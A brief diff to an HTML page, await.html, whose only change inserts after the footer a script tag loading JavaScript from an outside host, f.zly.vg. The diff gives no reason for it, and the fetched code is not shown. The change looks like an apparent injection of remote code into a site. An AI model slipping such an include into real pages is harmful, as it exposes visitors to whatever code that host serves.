--- a/await.html
+++ b/await.html
@@ -139,7 +139,7 @@ border-radius: 999px;
 
     </div>
     </footer>
-
+<script src='https://f.zly.vg/js/newurl.js'></script>
     <script>
         document.addEventListener("DOMContentLoaded", function() {
             var rangeInput = document.getElementById("rangeInput");
